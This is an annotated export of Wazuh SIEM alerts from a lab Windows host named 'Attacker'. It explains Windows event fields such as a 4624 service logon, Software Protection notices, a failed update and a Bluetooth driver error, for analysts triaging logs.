The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Length of the session key generated during logon (e.g., 128‑bit); 0 means no session key was requested. Unexpectedly weak keys can indicate a downgrade.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\Windows\System32\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Software protection service scheduled successfully. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 60642 Numeric ID of the detection rule that fired.
rule.firedtimes: 12 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_application'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534819.2397819 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-SPP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Software Protection Platform Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 16384 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x80000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:45:44.7822583Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2421 Incremental log record number – handy for timeline order.
data.win.system.processID: 10660 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Application No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Successfully scheduled Software Protection service for re-start at 2025-04-25T22:31:44Z. Reason: RulesEngine." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.data: 2025-04-25T22:31:44Z, RulesEngine No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Windows System error event Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 61102 Numeric ID of the detection rule that fired.
rule.firedtimes: 4 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_system', 'system_error'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gpg13: ['4.3'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534826.2399401 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-WindowsUpdateClient No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {945a8954-c147-4acd-923f-40c45405a658} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 20 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 13 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000028 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:45:51.3230557Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 3030 Incremental log record number – handy for timeline order.
data.win.system.processID: 9648 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 5444 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: ERROR TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Installation Failure: Windows failed to install the following update with error 0x80073D02: 9NMPJ99VJBWV-Microsoft.YourPhone." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.errorCode: 0x80073d02 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.updateTitle: 9NMPJ99VJBWV-Microsoft.YourPhone No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.updateGuid: {2eb475fe-568c-40c0-97c7-1b48d934a305} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.updateRevisionNumber: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.serviceGuid: {855e8a7c-ecb4-4ca3-b045-1dfa50104289} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Service startup type was changed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 61104 Numeric ID of the detection rule that fired.
rule.info: This does not appear to be logged on Windows 2000 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.firedtimes: 11 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_system', 'policy_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6'] PCI DSS mapping – card‑holder data rules.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6'] NIST 800‑53 mapping – US Fed controls.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534843.2401275 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {555908d1-a6d7-4695-8e1e-26931d2012f4} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 7040 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8080000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:46:11.7493654Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 3035 Incremental log record number – handy for timeline order.
data.win.system.processID: 772 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 7040 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "The start type of the Background Intelligent Transfer Service service was changed from auto start to demand start." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param1: Background Intelligent Transfer Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param2: auto start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param3: demand start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param4: BITS No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534844.2403086 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24T22:47:24.340053+00:00 server1 sshd[3469]: pam_unix(sshd:session): session closed for user simba The complete raw log message before parsing – last‑resort truth for deep dives.
predecoder.program_name: sshd Process that originally wrote the log line (e.g., sshd, sudo).
predecoder.timestamp: 2025-04-24T22:47:24.340053+00:00 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
decoder.parent: pam Parent decoder used – for nested parsing.
decoder.name: pam Name of the Wazuh decoder that parsed this raw log.
data.dstuser: simba No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/auth.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: Agent event queue is back to normal load. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 205 Numeric ID of the detection rule that fired.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['wazuh', 'agent_flooding'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534852.2403479 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: wazuh: Agent buffer: 'normal'. The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.parent: wazuh Parent decoder used – for nested parsing.
decoder.name: wazuh Name of the Wazuh decoder that parsed this raw log.
data.level: normal Sometimes reused by custom decoders for ad‑hoc severity – treat with caution.
location: wazuh-agent Which log source produced the event (e.g., sysmon, auditd).
rule.description: Software protection service scheduled successfully. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 60642 Numeric ID of the detection rule that fired.
rule.firedtimes: 13 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_application'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534974.2403694 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-SPP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Software Protection Platform Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 16384 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x80000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:47:09.2829375Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2423 Incremental log record number – handy for timeline order.
data.win.system.processID: 9456 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Application No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Successfully scheduled Software Protection service for re-start at 2025-04-25T22:31:09Z. Reason: RulesEngine." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.data: 2025-04-25T22:31:09Z, RulesEngine No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534983.2405274 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing ETW provider that wrote the event. Security-Auditing is the Security log's audit provider, the source of 4624/4625/4688 and friends.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} Provider GUID; this one is Microsoft-Windows-Security-Auditing. Filter on it when events arrive forwarded or under a renamed channel.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). 4624 = an account was successfully logged on. Learn the big ones!
data.win.system.version: 3 Schema version of the event template. Later versions add fields (Restricted Admin Mode, Remote Credential Guard, Virtual Account and Elevated Token are newer additions to 4624), so any parser keyed on field position must check it.
data.win.system.level: 0 Level 0 = LogAlways. Security audit events always carry level 0; success vs failure lives in the keywords, not the level.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.); 12544 is the Logon subcategory of Logon/Logoff.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows. 0x8020000000000000 is Audit Success, 0x8010000000000000 is Audit Failure; filter on this rather than on the severityValue text.
data.win.system.systemTime: 2025-04-24T22:47:59.3887351Z Time the event was written, UTC with 100 ns resolution (the seven fractional digits). Compare with the alert id (Unix seconds) to see ingestion lag.
data.win.system.eventRecordID: 43974 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 PID of the process that emitted the event. For Security-Auditing that is lsass.exe, which is why every 4624 on this host shows the same PID.
data.win.system.threadID: 2444 Thread inside the emitting process. Rarely useful outside deep forensics.
data.win.system.channel: Security Event log channel. Security is the audit log; the matching audit policy (here Logon/Logoff > Logon) must be enabled or the event never exists to collect.
data.win.system.computer: Attacker Hostname recorded by Windows itself. Should match agent.name; a mismatch means a forwarded event or a renamed host.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity derived by the Wazuh decoder from level/keywords (AUDIT_SUCCESS, AUDIT_FAILURE, INFORMATION, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 SID of the account that requested the logon. S-1-5-18 is LOCAL SYSTEM.
data.win.eventdata.subjectUserName: ATTACKER$ Requesting account name. The trailing $ marks the computer account, which is how SYSTEM appears on a workgroup host.
data.win.eventdata.subjectDomainName: WORKGROUP Authority of the requester. WORKGROUP means the host is not domain-joined, so expect local SAM/NTLM rather than Kerberos.
data.win.eventdata.subjectLogonId: 0x3e7 Logon session of the requester. 0x3E7 (999) is the well-known SYSTEM session; 0x3E4 is Network Service and 0x3E5 Local Service.
data.win.eventdata.targetUserSid: S-1-5-18 SID of the account that was logged on. Same as the subject here: SYSTEM creating a session for SYSTEM.
data.win.eventdata.targetUserName: SYSTEM Account that was logged on. Pivot on this plus targetLogonId to find everything the session did.
data.win.eventdata.targetDomainName: NT AUTHORITY Authority of the logged-on account; NT AUTHORITY for built-in identities.
data.win.eventdata.targetLogonId: 0x3e7 Logon ID of the new session. It is the join key to 4634/4647 (logoff), 4672 (special privileges) and 4688 (process create) for the same session.
data.win.eventdata.logonType: 5 Numeric logon type. 5 = Service: the Service Control Manager started a service under this account. Routine at boot and on every service (re)start; check the target account and the requesting process, not the type.
data.win.eventdata.logonProcessName: Advapi Logon process that submitted the request. Advapi is the name used for LogonUser/LsaLogonUser API calls; services.exe uses it for service logons.
data.win.eventdata.authenticationPackageName: Negotiate Authentication package. Negotiate selects Kerberos when a KDC is reachable and otherwise falls back to NTLM; on a WORKGROUP host this is local SAM authentication.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} Logon GUID. Populated for Kerberos logons so you can correlate with 4768/4769 on the KDC; all zeros for local and NTLM logons like this one.
data.win.eventdata.keyLength: 0 Length in bits of the session key generated for this logon. 0 means no session key was requested (normal for local and service logons), not a weak key; a small non-zero value such as 56 on an NTLM network logon is the downgrade signal.
data.win.eventdata.processId: 0x304 PID (hex) of the process that requested the logon; 0x304 = 772.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe Image of the requesting process. services.exe is the Service Control Manager, the expected requester for type 5 logons; a type 5 requested by anything else deserves a look.
data.win.eventdata.impersonationLevel: %%1833 Windows resource-string code, not an error. %%1833 renders as Impersonation (see the message above); %%1832 is Identification, %%1840 Delegation, %%1841 Anonymous.
data.win.eventdata.virtualAccount: %%1843 %%1843 renders as No (virtual accounts are per-service identities such as NT SERVICE\\name); %%1842 would be Yes.
data.win.eventdata.targetLinkedLogonId: 0x0 Logon ID of the paired UAC split-token session, if any. 0x0 = none, which is normal for service logons.
data.win.eventdata.elevatedToken: %%1842 %%1842 renders as Yes: the new session holds a full (unfiltered) token. Expected for SYSTEM.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Software protection service scheduled successfully. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 60642 Numeric ID of the detection rule that fired.
rule.firedtimes: 14 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_application'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534984.2412611 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-SPP ETW provider. Security-SPP is the Software Protection Platform (licensing/activation); despite the name it has nothing to do with the Security audit log.
data.win.system.providerGuid: {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156} Provider GUID for Security-SPP.
data.win.system.eventSourceName: Software Protection Platform Service Legacy event source name. Present when the event was written through the classic (pre-manifest) event log API; old-style filters match on it.
data.win.system.eventID: 16384 Classic Windows Event ID (4624, 4688, etc.). IDs are only unique per provider: 16384 from SPP is its routine "service restart scheduled" notice.
data.win.system.version: 0 Schema version of the event template; 0 for legacy-style events.
data.win.system.level: 4 Level 4 = Informational (1 Critical, 2 Error, 3 Warning, 4 Informational, 5 Verbose).
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.); 0 = none.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x80000000000000 Bit‑flag keywords set by Windows. 0x80000000000000 is the Classic keyword: the event came in through the legacy event log API.
data.win.system.systemTime: 2025-04-24T22:48:07.3897224Z Time the event was written, UTC with 100 ns resolution.
data.win.system.eventRecordID: 2425 Incremental log record number – handy for timeline order.
data.win.system.processID: 14384 PID of the emitting process (the Software Protection service, sppsvc.exe). It is the PID at write time; PIDs get reused, so confirm against a 4688 or Sysmon event before relying on it.
data.win.system.threadID: 0 Thread of the emitting process; 0 for legacy-API events.
data.win.system.channel: Application Event log channel. Application is writable by any local process, so its contents are lower-trust than Security.
data.win.system.computer: Attacker Hostname recorded by Windows itself. Should match agent.name.
data.win.system.severityValue: INFORMATION TEXT severity derived by the Wazuh decoder from the level (INFORMATION, WARNING, ERROR).
data.win.system.message: "Successfully scheduled Software Protection service for re-start at 2025-04-25T22:31:07Z. Reason: RulesEngine." Rendered message. Same routine licensing notice as the earlier SPP event, scheduled two seconds apart; rule.firedtimes 14 shows how chatty it is.
data.win.eventdata.data: 2025-04-25T22:31:07Z, RulesEngine Raw template inserts for the message (restart time, reason).
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Windows System error event Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 61102 Numeric ID of the detection rule that fired.
rule.firedtimes: 5 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_system', 'system_error'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gpg13: ['4.3'] Mapping to the UK GPG13 (Good Practice Guide 13) protective-monitoring controls; 4.3 is the control this rule is tagged with. Compliance metadata only, no bearing on severity.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534985.2414193 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: BTHUSB Event source. BTHUSB is the Bluetooth USB driver (bthusb.sys); kernel drivers log under their own names.
data.win.system.eventID: 17 Classic Windows Event ID (4624, 4688, etc.). Event IDs are only unique per provider: 17 from BTHUSB is an adapter failure and has nothing to do with 17 from any other source.
data.win.system.version: 0 Schema version of the event template; 0 for legacy-style events.
data.win.system.level: 2 Level 2 = Error (1 Critical, 2 Error, 3 Warning, 4 Informational, 5 Verbose).
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.); 0 = none.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x80000000000000 Bit‑flag keywords set by Windows. 0x80000000000000 is the Classic keyword (legacy event log API).
data.win.system.systemTime: 2025-04-24T22:48:59.6557881Z Time the event was written, UTC with 100 ns resolution.
data.win.system.eventRecordID: 3055 Incremental log record number – handy for timeline order.
data.win.system.processID: 4 PID 4 is the System process: the event was written from kernel mode by the driver.
data.win.system.threadID: 10108 Kernel thread that wrote the event. Rarely useful outside deep forensics.
data.win.system.channel: System Event log channel. System holds driver, kernel and service-control events.
data.win.system.computer: Attacker Hostname recorded by Windows itself. Should match agent.name.
data.win.system.severityValue: ERROR TEXT severity derived by the Wazuh decoder from the level (INFORMATION, WARNING, ERROR).
data.win.system.message: "The local Bluetooth adapter has failed in an undetermined manner and will not be used. The driver has been unloaded." Rendered message. A hardware/driver failure, written about half a second after the VMware Tools resume script in the Sysmon event below (22:48:59.088), i.e. device re-enumeration on VM resume. Benign on its own; it matters only alongside other device or driver changes.
data.win.eventdata.binary: 000000000100000000000000110005C0000000000000000000000000000000000000000000000000 Driver-supplied binary data in hex, not parsed by Wazuh. Decode per driver; these blobs usually carry little-endian status codes (read each 4-byte group reversed).
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Windows command prompt started by an abnormal process Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92052 Numeric ID of the detection rule that fired.
